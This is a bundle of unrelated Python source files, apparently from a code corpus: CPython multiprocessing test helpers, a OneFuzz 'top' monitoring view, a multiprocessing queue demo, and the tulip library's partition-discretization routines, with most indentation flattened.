threads = set(threading._dangling) - set(cls.dangling[1])
if threads:
test.support.environment_altered = True
support.print_warning(f'Dangling threads: {threads}')
threads = None
class ProcessesMixin(BaseMixin):
TYPE = 'processes'
Process = multiprocessing.Process
connection = multiprocessing.connection
current_process = staticmethod(multiprocessing.current_process)
parent_process = staticmethod(multiprocessing.parent_process)
active_children = staticmethod(multiprocessing.active_children)
Pool = staticmethod(multiprocessing.Pool)
Pipe = staticmethod(multiprocessing.Pipe)
Queue = staticmethod(multiprocessing.Queue)
JoinableQueue = staticmethod(multiprocessing.JoinableQueue)
Lock = staticmethod(multiprocessing.Lock)
RLock = staticmethod(multiprocessing.RLock)
Semaphore = staticmethod(multiprocessing.Semaphore)
BoundedSemaphore = staticmethod(multiprocessing.BoundedSemaphore)
Condition = staticmethod(multiprocessing.Condition)
Event = staticmethod(multiprocessing.Event)
Barrier = staticmethod(multiprocessing.Barrier)
Value = staticmethod(multiprocessing.Value)
Array = staticmethod(multiprocessing.Array)
RawValue = staticmethod(multiprocessing.RawValue)
RawArray = staticmethod(multiprocessing.RawArray)
class ManagerMixin(BaseMixin):
TYPE = 'manager'
Process = multiprocessing.Process
Queue = property(operator.attrgetter('manager.Queue'))
JoinableQueue = property(operator.attrgetter('manager.JoinableQueue'))
Lock = property(operator.attrgetter('manager.Lock'))
RLock = property(operator.attrgetter('manager.RLock'))
Semaphore = property(operator.attrgetter('manager.Semaphore'))
BoundedSemaphore = property(operator.attrgetter('manager.BoundedSemaphore'))
Condition = property(operator.attrgetter('manager.Condition'))
Event = property(operator.attrgetter('manager.Event'))
Barrier = property(operator.attrgetter('manager.Barrier'))
Value = property(operator.attrgetter('manager.Value'))
Array = property(operator.attrgetter('manager.Array'))
list = property(operator.attrgetter('manager.list'))
dict = property(operator.attrgetter('manager.dict'))
Namespace = property(operator.attrgetter('manager.Namespace'))
@classmethod
def Pool(cls, *args, **kwds):
return cls.manager.Pool(*args, **kwds)
@classmethod
def setUpClass(cls):
super().setUpClass()
cls.manager = multiprocessing.Manager()
@classmethod
def tearDownClass(cls):
# only the manager process should be returned by active_children()
# but this can take a bit on slow machines, so wait a few seconds
# if there are other children too (see #17395)
start_time = time.monotonic()
t = 0.01
while len(multiprocessing.active_children()) > 1:
time.sleep(t)
t *= 2
dt = time.monotonic() - start_time
if dt >= 5.0:
test.support.environment_altered = True
support.print_warning(f"multiprocess.Manager still has "
f"{multiprocessing.active_children()} "
f"active children after {dt} seconds")
break
gc.collect() # do garbage collection
if cls.manager._number_of_objects() != 0:
# This is not really an error since some tests do not
# ensure that all processes which hold a reference to a
# managed object have been joined.
test.support.environment_altered = True
support.print_warning('Shared objects which still exist '
'at manager shutdown:')
support.print_warning(cls.manager._debug_info())
cls.manager.shutdown()
cls.manager.join()
cls.manager = None
super().tearDownClass()
class ThreadsMixin(BaseMixin):
TYPE = 'threads'
Process = multiprocessing.dummy.Process
connection = multiprocessing.dummy.connection
current_process = staticmethod(multiprocessing.dummy.current_process)
active_children = staticmethod(multiprocessing.dummy.active_children)
Pool = staticmethod(multiprocessing.dummy.Pool)
Pipe = staticmethod(multiprocessing.dummy.Pipe)
Queue = staticmethod(multiprocessing.dummy.Queue)
JoinableQueue = staticmethod(multiprocessing.dummy.JoinableQueue)
Lock = staticmethod(multiprocessing.dummy.Lock)
RLock = staticmethod(multiprocessing.dummy.RLock)
Semaphore = staticmethod(multiprocessing.dummy.Semaphore)
BoundedSemaphore = staticmethod(multiprocessing.dummy.BoundedSemaphore)
Condition = staticmethod(multiprocessing.dummy.Condition)
Event = staticmethod(multiprocessing.dummy.Event)
Barrier = staticmethod(multiprocessing.dummy.Barrier)
Value = staticmethod(multiprocessing.dummy.Value)
Array = staticmethod(multiprocessing.dummy.Array)
#
# Functions used to create test cases from the base ones in this module
#
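# install_tests_in_module_dict() synthesizes one concrete TestCase per allowed
# type ('processes', 'threads', 'manager') for every BaseTestCase subclass
# defined here, mixes in the matching *Mixin, and publishes the result in the
# calling test module under a 'With<Type>...' name; other TestCase classes and
# the module-level setUp/tearDown hooks are copied through unchanged.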
def install_tests_in_module_dict(remote_globs, start_method):
__module__ = remote_globs['__name__']
local_globs = globals()
ALL_TYPES = {'processes', 'threads', 'manager'}
for name, base in local_globs.items():
if not isinstance(base, type):
continue
if issubclass(base, BaseTestCase):
if base is BaseTestCase:
continue
assert set(base.ALLOWED_TYPES) <= ALL_TYPES, base.ALLOWED_TYPES
for type_ in base.ALLOWED_TYPES:
newname = 'With' + type_.capitalize() + name[1:]
Mixin = local_globs[type_.capitalize() + 'Mixin']
class Temp(base, Mixin, unittest.TestCase):
pass
if type_ == 'manager':
Temp = hashlib_helper.requires_hashdigest('md5')(Temp)
Temp.__name__ = Temp.__qualname__ = newname
Temp.__module__ = __module__
remote_globs[newname] = Temp
elif issubclass(base, unittest.TestCase):
class Temp(base, object):
pass
Temp.__name__ = Temp.__qualname__ = name
Temp.__module__ = __module__
remote_globs[name] = Temp
dangling = [None, None]
old_start_method = [None]
def setUpModule():
multiprocessing.set_forkserver_preload(PRELOAD)
multiprocessing.process._cleanup()
dangling[0] = multiprocessing.process._dangling.copy()
dangling[1] = threading._dangling.copy()
old_start_method[0] = multiprocessing.get_start_method(allow_none=True)
try:
multiprocessing.set_start_method(start_method, force=True)
except ValueError:
raise unittest.SkipTest(start_method +
' start method not supported')
if sys.platform.startswith("linux"):
try:
lock = multiprocessing.RLock()
except OSError:
raise unittest.SkipTest("OSError raises on RLock creation, "
"see issue 3111!")
check_enough_semaphores()
util.get_temp_dir() # creates temp directory
multiprocessing.get_logger().setLevel(LOG_LEVEL)
def tearDownModule():
need_sleep = False
# bpo-26762: Some multiprocessing objects like Pool create reference
# cycles. Trigger a garbage collection to break these cycles.
test.support.gc_collect()
multiprocessing.set_start_method(old_start_method[0], force=True)
# pause a bit so we don't get warning about dangling threads/processes
processes = set(multiprocessing.process._dangling) - set(dangling[0])
if processes:
need_sleep = True
test.support.environment_altered = True
support.print_warning(f'Dangling processes: {processes}')
processes = None
threads = set(threading._dangling) - set(dangling[1])
if threads:
need_sleep = True
test.support.environment_altered = True
support.print_warning(f'Dangling threads: {threads}')
threads = None
# Sleep 500 ms to give time to child processes to complete.
if need_sleep:
time.sleep(0.5)
multiprocessing.util._cleanup_tests()
remote_globs['setUpModule'] = setUpModule
remote_globs['tearDownModule'] = tearDownModule
|
top.py
|
#!/usr/bin/env python
#
# Copyright (c) Microsoft Corporation.
# Licensed under the MIT License.
import logging
import time
from queue import PriorityQueue
from threading import Thread
from typing import Any, Optional
from .cache import JobFilter, TopCache
from .signalr import Stream
from .top_view import render
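# Work items on the priority queue are (priority, payload) tuples: payload is
# either (callable, args) or None, the shutdown sentinel. Cache updates are
# enqueued with priority 2 and the sentinel with priority 1, so a shutdown
# request jumps ahead of any pending work.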
def background_task(queue: PriorityQueue) -> None:
while True:
(_, entry) = queue.get(block=True)
if entry is None:
queue.task_done()
return
(cmd, args) = entry
cmd(*args)
queue.task_done()
class Top:
def __init__(
self,
onefuzz: "Onefuzz",
logger: logging.Logger,
job_filter: JobFilter,
):
self.onefuzz = onefuzz
self.logger = logger
self.cache = TopCache(onefuzz, job_filter)
self.queue: PriorityQueue = PriorityQueue()
self.worker = Thread(target=background_task, args=(self.queue,))
self.worker.start()
def add_container(self, name: str) -> None:
if name in self.cache.files:
return
self.queue.put((2, (self.cache.add_container, [name])))
def handler(self, message: Any) -> None:
for event_raw in message:
self.cache.add_message(event_raw)
def setup(self) -> Stream:
client = Stream(self.onefuzz, self.logger)
client.setup(self.handler)
self.logger.info("getting initial data")
pools = self.onefuzz.pools.list()
for pool in pools:
self.cache.add_pool(pool)
for job in self.onefuzz.jobs.list():
mini_job = self.cache.add_job(job)
            # don't pre-add tasks for jobs that we're going to filter out
if not self.cache.should_render_job(mini_job):
continue
for task in self.onefuzz.tasks.list(job_id=job.job_id):
self.cache.add_task(task)
for container in task.config.containers:
self.add_container(container.name)
nodes = self.onefuzz.nodes.list()
for node in nodes:
self.cache.add_node(node)
if client.connected is None:
self.logger.info("waiting for signalr connection")
while client.connected is None:
time.sleep(1)
return client
def run(self) -> None:
try:
client = self.setup()
except Exception as err:
self.queue.put((1, None))
raise err
error: Optional[Exception] = None
try:
self.logger.info("rendering")
render(self.cache)
client.stop()
except Exception as err:
error = err
self.queue.put((1, None))
if error is not None:
raise error
from ..api import Onefuzz # noqa: E402
|
queue_m1.py
|
from collections import namedtuple
import multiprocessing as mp
import random
import time
VALUES = (100, 200, 500, 1000)
Coin = namedtuple('Coin', ['value'])
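# The reader runs in a separate (daemon) process and drains the queue; it
# gives up after 25 consecutive empty polls, which acts as a crude
# end-of-stream signal since the writer never sends an explicit sentinel.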
def reader(queue):
termination_threshold = 25
termination_count = 0
reader_sum = 0
while termination_count < termination_threshold:
if queue.empty():
print("[Process {}] Waiting for new items...".format(
mp.current_process().name))
time.sleep(random.random() * 0.50)
termination_count += 1
else:
termination_count = 0
coin = queue.get()
reader_sum += coin.value
time.sleep(random.random() * 0.50)
print("[Process {}] Read coin ({})".format(
mp.current_process().name, str(coin.value)))
print("[Process {}] Total value read: {}".format(
mp.current_process().name, reader_sum))
print("[Process {}] Exiting...".format(mp.current_process().name))
def writer(count, queue):
writer_sum = 0
for ii in range(count):
coin = Coin(random.choice(VALUES))
queue.put(coin)
writer_sum += coin.value
        # No need to prefix the message with the process name, since this
        # function runs in the main process
print("Put coin ({}) into queue".format(coin.value))
time.sleep(random.random() * 0.50)
print('Total value written: ' + str(writer_sum))
if __name__ == '__main__':
start_time = time.time()
count = 100
queue = mp.Queue() # Queue class from multiprocessing module
reader_p1 = mp.Process(target=reader, name='Reader 1', args=(queue,))
reader_p1.daemon = True
reader_p1.start()
writer(count, queue)
reader_p1.join()
end_time = time.time()
print('Total running time: ' + str(end_time - start_time))
|
discretization.py
|
# Copyright (c) 2011-2016 by California Institute of Technology
# Copyright (c) 2016 by The Regents of the University of Michigan
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# 3. Neither the name of the copyright holder(s) nor the names of its
# contributors may be used to endorse or promote products derived
# from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
# COPYRIGHT HOLDERS OR THE CONTRIBUTORS BE LIABLE FOR ANY DIRECT,
# INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
# HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
# STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING
# IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
#
"""
Algorithms related to discretization of continuous dynamics.
See Also
========
L{find_controller}
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import logging
logger = logging.getLogger(__name__)
import os
import warnings
import pprint
from copy import deepcopy
import multiprocessing as mp
import numpy as np
from scipy import sparse as sp
import polytope as pc
from polytope.plot import plot_partition, plot_transition_arrow
from tulip import transys as trs
from tulip.hybrid import LtiSysDyn, PwaSysDyn
from .prop2partition import (PropPreservingPartition,
pwa_partition, part2convex)
from .feasible import is_feasible, solve_feasible
from .plot import plot_ts_on_partition
# inline imports:
#
# inline: import matplotlib.pyplot as plt
debug = False
class AbstractSwitched(object):
"""Abstraction of SwitchedSysDyn, with mode-specific and common info.
Attributes:
- ppp: merged partition, if any
Preserves both propositions and dynamics
- ts: common TS, if any
- ppp2ts: map from C{ppp.regions} to C{ts.states}
- modes: dict of {mode: AbstractPwa}
- ppp2modes: map from C{ppp.regions} to C{modes[mode].ppp.regions}
of the form:
{mode: list}
where C{list} has same indices as C{ppp.regions} and
elements in each C{list} are indices of regions in
each C{modes[mode].ppp.regions}.
type: dict
Each partition corresponds to some mode.
(for switched systems)
In each mode a L{PwaSysDyn} is active.
"""
def __init__(
self, ppp=None, ts=None, ppp2ts=None,
modes=None, ppp2modes=None
):
if modes is None:
modes = dict()
self.ppp = ppp
self.ts = ts
self.ppp2ts = ppp2ts
self.modes = modes
self.ppp2modes = ppp2modes
def __str__(self):
s = 'Abstraction of switched system\n'
s += str('common PPP:\n') + str(self.ppp)
s += str('common ts:\n') + str(self.ts)
for mode, ab in self.modes.items():
s += 'mode: ' + str(mode)
s += ', with abstraction:\n' + str(ab)
return s
def ppp2pwa(self, mode, i):
"""Return original C{Region} containing C{Region} C{i} in C{mode}.
@param mode: key of C{modes}
@param i: Region index in common partition C{ppp.regions}.
@return: tuple C{(j, region)} of:
- index C{j} of C{Region} and
- C{Region} object
in C{modes[mode].ppp.regions}
"""
region_idx = self.ppp2modes[mode][i]
ab = self.modes[mode]
return ab.ppp2pwa(region_idx)
def ppp2sys(self, mode, i):
"""Return index of active PWA subsystem in C{mode},
@param mode: key of C{modes}
@param i: Region index in common partition C{ppp.regions}.
@return: tuple C{(j, subsystem)} of:
- index C{j} of PWA C{subsystem}
- L{LtiSysDyn} object C{subsystem}
"""
region_idx = self.ppp2modes[mode][i]
ab = self.modes[mode]
return ab.ppp2sys(region_idx)
def plot(self, show_ts=False, only_adjacent=False):
"""Plot mode partitions and merged partition, if one exists.
For details see L{AbstractPwa.plot}.
"""
axs = []
color_seed = 0
# merged partition exists ?
if self.ppp is not None:
for mode in self.modes:
env_mode, sys_mode = mode
edge_label = {'env_actions':env_mode,
'sys_actions':sys_mode}
ax = _plot_abstraction(
self, show_ts=False, only_adjacent=False,
color_seed=color_seed
)
plot_ts_on_partition(
self.ppp, self.ts, self.ppp2ts,
edge_label, only_adjacent, ax
)
axs += [ax]
# plot mode partitions
for mode, ab in self.modes.items():
ax = ab.plot(show_ts, only_adjacent, color_seed)
ax.set_title('Abstraction for mode: ' + str(mode))
axs += [ax]
#if isinstance(self.ts, dict):
# for ts in self.ts:
# ax = ts.plot()
# axs += [ax]
return axs
class AbstractPwa(object):
"""Discrete abstraction of PWA dynamics, with attributes:
- ppp: Partition into Regions.
Each Region corresponds to
a discrete state of the abstraction
type: L{PropPreservingPartition}
- ts: Finite transition system abstracting the continuous system.
Each state corresponds to a Region in C{ppp.regions}.
It can be fed into discrete synthesis algorithms.
type: L{FTS}
- ppp2ts: bijection between C{ppp.regions} and C{ts.states}.
Has common indices with C{ppp.regions}.
Elements are states in C{ts.states}.
(usually each state is a str)
type: list of states
- pwa: system dynamics
type: L{PwaSysDyn}
- pwa_ppp: partition preserving both:
- propositions and
- domains of PWA subsystems
Used for non-conservative planning.
If just L{LtiSysDyn}, then the only difference
of C{pwa_ppp} from C{orig_ppp} is convexification.
type: L{PropPreservingPartition}
- orig_ppp: partition preserving only propositions
i.e., agnostic of dynamics
type: L{PropPreservingPartition}
- disc_params: parameters used in discretization that
should be passed to the controller refinement
to ensure consistency
type: dict
If any of the above is not given,
then it is initialized to None.
Notes
=====
1. There could be some redundancy in ppp and ofts,
in that they are both decorated with propositions.
This might be useful to keep each of
them as functional units on their own
(possible to change later).
2. The 'Pwa' in L{AbstractPwa} includes L{LtiSysDyn}
as a special case.
"""
def __init__(
self, ppp=None, ts=None, ppp2ts=None,
pwa=None, pwa_ppp=None, ppp2pwa=None, ppp2sys=None,
orig_ppp=None, ppp2orig=None,
disc_params=None
):
if disc_params is None:
disc_params = dict()
self.ppp = ppp
self.ts = ts
self.ppp2ts = ppp2ts
self.pwa = pwa
self.pwa_ppp = pwa_ppp
self._ppp2pwa = ppp2pwa
self._ppp2sys = ppp2sys
self.orig_ppp = orig_ppp
self._ppp2orig = ppp2orig
# original_regions -> pwa_ppp
# ppp2orig -> ppp2pwa_ppp
# ppp2pwa -> ppp2pwa_sys
self.disc_params = disc_params
def __str__(self):
s = str(self.ppp)
s += str(self.ts)
s += 30 * '-' + '\n'
s += 'Map PPP Regions ---> TS states:\n'
s += self._ppp2other_str(self.ppp2ts) + '\n'
s += 'Map PPP Regions ---> PWA PPP Regions:\n'
s += self._ppp2other_str(self._ppp2pwa) + '\n'
s += 'Map PPP Regions ---> PWA Subsystems:\n'
s += self._ppp2other_str(self._ppp2sys) + '\n'
s += 'Map PPP Regions ---> Original PPP Regions:\n'
s += self._ppp2other_str(self._ppp2orig) + '\n'
s += 'Discretization Options:\n\t'
s += pprint.pformat(self.disc_params) +'\n'
return s
def ts2ppp(self, state):
region_index = self.ppp2ts.index(state)
region = self.ppp[region_index]
return (region_index, region)
def ppp2trans(self, region_index):
"""Return the transition set constraint and active subsystem,
for non-conservative planning.
"""
reg_idx, pwa_region = self.ppp2pwa(region_index)
sys_idx, sys = self.ppp2sys(region_index)
return pwa_region, sys
def ppp2pwa(self, region_index):
"""Return dynamics and predicate-preserving region
and its index for PWA subsystem active in given region.
The returned region is the C{trans_set} used for
non-conservative planning.
@param region_index: index in C{ppp.regions}.
@rtype: C{(i, pwa.pwa_ppp[i])}
"""
j = self._ppp2pwa[region_index]
pwa_region = self.pwa_ppp[j]
return (j, pwa_region)
def ppp2sys(self, region_index):
"""Return index and PWA subsystem active in indexed region.
Semantics: j-th sub-system is active in i-th Region,
where C{j = ppp2pwa[i]}
@param region_index: index in C{ppp.regions}.
@rtype: C{(i, pwa.list_subsys[i])}
"""
# LtiSysDyn ?
if self._ppp2sys is None:
return (0, self.pwa)
subsystem_idx = self._ppp2sys[region_index]
subsystem = self.pwa.list_subsys[subsystem_idx]
return (subsystem_idx, subsystem)
def ppp2orig(self, region_index):
"""Return index and region of original partition.
The original partition is w/o any dynamics,
not even the PWA domains, only the polytopic predicates.
@param region_index: index in C{ppp.regions}.
@rtype: C{(i, orig_ppp.regions[i])}
"""
j = self._ppp2orig[region_index]
orig_region = self.orig_ppp[j]
return (j, orig_region)
def _ppp2other_str(self, ppp2other):
if ppp2other is None:
return ''
s = ''
for i, other in enumerate(ppp2other):
s += '\t\t' + str(i) + ' -> ' + str(other) + '\n'
return s
def _debug_str_(self):
s = str(self.ppp)
s += str(self.ts)
s += '(PWA + Prop)-Preserving Partition'
s += str(self.pwa_ppp)
s += 'Original Prop-Preserving Partition'
s += str(self.orig_ppp)
return s
def plot(self, show_ts=False, only_adjacent=False,
color_seed=None):
"""Plot partition and optionally feasible transitions.
@param show_ts: plot feasible transitions on partition
@type show_ts: bool
@param only_adjacent: plot feasible transitions only
between adjacent regions. This reduces clutter,
but if horizon > 1 and not all horizon used,
then some transitions could be hidden.
@param only_adjacent: bool
"""
ax = _plot_abstraction(self, show_ts, only_adjacent,
color_seed)
return ax
def verify_transitions(self):
logger.info('verifying transitions...')
for from_state, to_state in self.ts.transitions():
i, from_region = self.ts2ppp(from_state)
j, to_region = self.ts2ppp(to_state)
trans_set, sys = self.ppp2trans(i)
            params = {'N', 'closed_loop', 'use_all_horizon'}
disc_params = {k:v for k,v in self.disc_params.items()
if k in params}
s0 = solve_feasible(from_region, to_region, sys,
trans_set=trans_set, **disc_params)
msg = str(i) + ' ---> ' + str(j)
if not from_region <= s0:
logger.error('incorrect transition: ' + msg)
isect = from_region.intersect(s0)
ratio = isect.volume /from_region.volume
                logger.error('intersection volume: ' + str(100 * ratio) + ' %')
else:
logger.info('correct transition: ' + msg)
def _plot_abstraction(ab, show_ts, only_adjacent, color_seed):
if ab.ppp is None or ab.ts is None:
warnings.warn('Either ppp or ts is None.')
return
if show_ts:
ts = ab.ts
ppp2ts = ab.ppp2ts
else:
ts = None
ppp2ts = None
ax = ab.ppp.plot(
ts, ppp2ts, only_adjacent=only_adjacent,
color_seed=color_seed
)
#ax = self.ts.plot()
return ax
def discretize(
part, ssys, N=10, min_cell_volume=0.1,
closed_loop=True, conservative=False,
max_num_poly=5, use_all_horizon=False,
trans_length=1, remove_trans=False,
abs_tol=1e-7,
plotit=False, save_img=False, cont_props=None,
plot_every=1, simu_type='bi'
):
"""Refine the partition via bisimulation
or dual-simulation algorithms, and establish transitions
based on reachability analysis.
Reference
=========
U{[NOTM12]
<https://tulip-control.sourceforge.io/doc/bibliography.html#notm12>}
See Also
========
L{prop2partition.pwa_partition}, L{prop2partition.part2convex}
@param part: L{PropPreservingPartition} object
@param ssys: L{LtiSysDyn} or L{PwaSysDyn} object
@param N: horizon length
@param min_cell_volume: the minimum volume of cells in the resulting
partition.
@param closed_loop: boolean indicating whether the `closed loop`
algorithm should be used. default True.
@param conservative: if true, force sequence in reachability analysis
to stay inside starting cell. If false, safety
is ensured by keeping the sequence inside a convexified
version of the original proposition preserving cell.
@param max_num_poly: maximum number of polytopes in a region to use in
reachability analysis.
@param use_all_horizon: in closed loop algorithm: if we should look
for reachability also in less than N steps.
@param trans_length: the number of polytopes allowed to cross in a
transition. a value of 1 checks transitions
only between neighbors, a value of 2 checks
neighbors of neighbors and so on.
@param remove_trans: if True, remove found transitions between
non-neighbors.
@param abs_tol: maximum volume for an "empty" polytope
@param plotit: plot partitioning as it evolves
@type plotit: boolean,
default = False
@param save_img: save snapshots of partitioning to PDF files,
requires plotit=True
@type save_img: boolean,
default = False
@param cont_props: continuous propositions to plot
@type cont_props: list of C{Polytope}
@param simu_type: if 'bi', use bisimulation partition; if 'dual',
use dual-simulation partition
@type simu_type: string,
default = 'bi'
@rtype: L{AbstractPwa}
"""
    if simu_type == 'bi':
        abstraction = _discretize_bi(
            part, ssys, N, min_cell_volume,
            closed_loop, conservative,
            max_num_poly, use_all_horizon,
            trans_length, remove_trans,
            abs_tol,
            plotit, save_img, cont_props,
            plot_every)
    elif simu_type == 'dual':
        abstraction = _discretize_dual(
            part, ssys, N, min_cell_volume,
            closed_loop, conservative,
            max_num_poly, use_all_horizon,
            trans_length, remove_trans,
            abs_tol,
            plotit, save_img, cont_props,
            plot_every)
    else:
        raise ValueError(
            'Unknown simulation type: "{st}"'.format(
                st=simu_type))
    return abstraction
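# Illustrative usage sketch (not part of the original module): 'sys_dyn' and
# 'cont_partition' are assumed to be an LtiSysDyn and a
# PropPreservingPartition built elsewhere, e.g. with the prop2partition
# helpers in this package.
#
#   ab = discretize(cont_partition, sys_dyn, N=8, min_cell_volume=0.1,
#                   simu_type='dual')
#   print(ab.ts)  # finite transition system over the refined partition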
def _discretize_bi(
part, ssys, N=10, min_cell_volume=0.1,
closed_loop=True, conservative=False,
max_num_poly=5, use_all_horizon=False,
trans_length=1, remove_trans=False,
abs_tol=1e-7,
plotit=False, save_img=False, cont_props=None,
plot_every=1
):
"""Refine the partition and establish transitions
based on reachability analysis. Use bi-simulation algorithm.
Reference
=========
1. U{[NOTM12]
<https://tulip-control.sourceforge.io/doc/bibliography.html#notm12>}
2. Wagenmaker, A. J.; Ozay, N.
"A Bisimulation-like Algorithm for Abstracting Control Systems."
54th Annual Allerton Conference on CCC 2016
See Also
========
L{prop2partition.pwa_partition}, L{prop2partition.part2convex}
@param part: L{PropPreservingPartition} object
@param ssys: L{LtiSysDyn} or L{PwaSysDyn} object
@param N: horizon length
@param min_cell_volume: the minimum volume of cells in the resulting
partition.
@param closed_loop: boolean indicating whether the `closed loop`
algorithm should be used. default True.
@param conservative: if true, force sequence in reachability analysis
to stay inside starting cell. If false, safety
is ensured by keeping the sequence inside a convexified
version of the original proposition preserving cell.
@param max_num_poly: maximum number of polytopes in a region to use in
reachability analysis.
@param use_all_horizon: in closed loop algorithm: if we should look
for reachability also in less than N steps.
@param trans_length: the number of polytopes allowed to cross in a
transition. a value of 1 checks transitions
only between neighbors, a value of 2 checks
neighbors of neighbors and so on.
@param remove_trans: if True, remove found transitions between
non-neighbors.
@param abs_tol: maximum volume for an "empty" polytope
@param plotit: plot partitioning as it evolves
@type plotit: boolean,
default = False
@param save_img: save snapshots of partitioning to PDF files,
requires plotit=True
@type save_img: boolean,
default = False
@param cont_props: continuous propositions to plot
@type cont_props: list of C{Polytope}
@rtype: L{AbstractPwa}
"""
start_time = os.times()[0]
orig_ppp = part
min_cell_volume = (min_cell_volume /np.finfo(np.double).eps
*np.finfo(np.double).eps)
ispwa = isinstance(ssys, PwaSysDyn)
islti = isinstance(ssys, LtiSysDyn)
if ispwa:
(part, ppp2pwa, part2orig) = pwa_partition(ssys, part)
else:
part2orig = range(len(part))
# Save original polytopes, require them to be convex
if conservative:
orig_list = None
orig = [0]
else:
(part, new2old) = part2convex(part) # convexify
part2orig = [part2orig[i] for i in new2old]
# map new regions to pwa subsystems
if ispwa:
ppp2pwa = [ppp2pwa[i] for i in new2old]
remove_trans = False # already allowed in nonconservative
orig_list = []
for poly in part:
if len(poly) == 0:
orig_list.append(poly.copy())
elif len(poly) == 1:
orig_list.append(poly[0].copy())
else:
raise Exception("discretize: "
"problem in convexification")
orig = list(range(len(orig_list)))
# Cheby radius of disturbance set
# (defined within the loop for pwa systems)
if islti:
if len(ssys.E) > 0:
rd = ssys.Wset.chebR
else:
rd = 0.
# Initialize matrix for pairs to check
IJ = part.adj.copy().toarray()
logger.debug("\n Starting IJ: \n" + str(IJ) )
# next line omitted in discretize_overlap
IJ = reachable_within(trans_length, IJ,
part.adj.toarray())
# Initialize output
num_regions = len(part)
transitions = np.zeros(
[num_regions, num_regions],
dtype = int
)
sol = deepcopy(part.regions)
adj = part.adj.copy().toarray()
# next 2 lines omitted in discretize_overlap
if ispwa:
subsys_list = list(ppp2pwa)
else:
subsys_list = None
ss = ssys
# init graphics
if plotit:
try:
import matplotlib.pyplot as plt
plt.ion()
fig, (ax1, ax2) = plt.subplots(1, 2)
ax1.axis('scaled')
ax2.axis('scaled')
file_extension = 'pdf'
        except Exception:
logger.error('failed to import matplotlib')
plt = None
else:
plt = None
iter_count = 0
# List of how many "new" regions
# have been created for each region
# and a list of original number of neighbors
#num_new_reg = np.zeros(len(orig_list))
#num_orig_neigh = np.sum(adj, axis=1).flatten() - 1
progress = list()
# Do the abstraction
while np.sum(IJ) > 0:
ind = np.nonzero(IJ)
# i,j swapped in discretize_overlap
i = ind[1][0]
j = ind[0][0]
IJ[j, i] = 0
si = sol[i]
sj = sol[j]
si_tmp = deepcopy(si)
sj_tmp = deepcopy(sj)
if ispwa:
ss = ssys.list_subsys[subsys_list[i]]
if len(ss.E) > 0:
rd, xd = pc.cheby_ball(ss.Wset)
else:
rd = 0.
if conservative:
# Don't use trans_set
trans_set = None
else:
# Use original cell as trans_set
trans_set = orig_list[orig[i]]
S0 = solve_feasible(
si, sj, ss, N, closed_loop,
use_all_horizon, trans_set, max_num_poly
)
msg = '\n Working with partition cells: {i}, {j}'.format(i=i,
j=j)
logger.info(msg)
msg = '\t{i} (#polytopes = {num}), and:\n'.format(i=i,
num=len(si))
msg += '\t{j} (#polytopes = {num})\n'.format(j=j,
num=len(sj))
if ispwa:
msg += '\t with active subsystem: '
msg += '{sys}\n'.format(sys=subsys_list[i])
msg += '\t Computed reachable set S0 with volume: '
msg += '{vol}\n'.format(vol=S0.volume)
logger.debug(msg)
#logger.debug(r'si \cap s0')
isect = si.intersect(S0)
vol1 = isect.volume
risect, xi = pc.cheby_ball(isect)
#logger.debug(r'si \ s0')
diff = si.diff(S0)
vol2 = diff.volume
rdiff, xd = pc.cheby_ball(diff)
# if pc.is_fulldim(pc.Region([isect]).intersect(diff)):
# logging.getLogger('tulip.polytope').setLevel(logging.DEBUG)
# diff = pc.mldivide(si, S0, save=True)
#
# ax = S0.plot()
# ax.axis([0.0, 1.0, 0.0, 2.0])
# ax.figure.savefig('./img/s0.pdf')
#
# ax = si.plot()
# ax.axis([0.0, 1.0, 0.0, 2.0])
# ax.figure.savefig('./img/si.pdf')
#
# ax = isect.plot()
# ax.axis([0.0, 1.0, 0.0, 2.0])
# ax.figure.savefig('./img/isect.pdf')
#
# ax = diff.plot()
# ax.axis([0.0, 1.0, 0.0, 2.0])
# ax.figure.savefig('./img/diff.pdf')
#
# ax = isect.intersect(diff).plot()
# ax.axis([0.0, 1.0, 0.0, 2.0])
# ax.figure.savefig('./img/diff_cap_isect.pdf')
#
# logger.error(r'Intersection \cap Difference != \emptyset')
#
# assert(False)
if vol1 <= min_cell_volume:
logger.warning('\t too small: si \\cap Pre(sj), '
'so discard intersection')
if vol1 <= min_cell_volume and isect:
logger.warning('\t discarded non-empty intersection: '
'consider reducing min_cell_volume')
if vol2 <= min_cell_volume:
logger.warning('\t too small: si \\ Pre(sj), so not reached it')
# We don't want our partitions to be smaller than the disturbance set
# Could be a problem since cheby radius is calculated for smallest
# convex polytope, so if we have a region we might throw away a good
# cell.
if (
vol1 > min_cell_volume and
risect > rd and
vol2 > min_cell_volume and
rdiff > rd):
# Make sure new areas are Regions and add proposition lists
if len(isect) == 0:
isect = pc.Region([isect], si.props)
else:
isect.props = si.props.copy()
if len(diff) == 0:
diff = pc.Region([diff], si.props)
else:
diff.props = si.props.copy()
# replace si by intersection (single state)
isect_list = pc.separate(isect)
sol[i] = isect_list[0]
# cut difference into connected pieces
difflist = pc.separate(diff)
difflist += isect_list[1:]
# n_isect = len(isect_list) -1
num_new = len(difflist)
# add each piece, as a new state
for region in difflist:
sol.append(region)
# keep track of PWA subsystems map to new states
if ispwa:
subsys_list.append(subsys_list[i])
n_cells = len(sol)
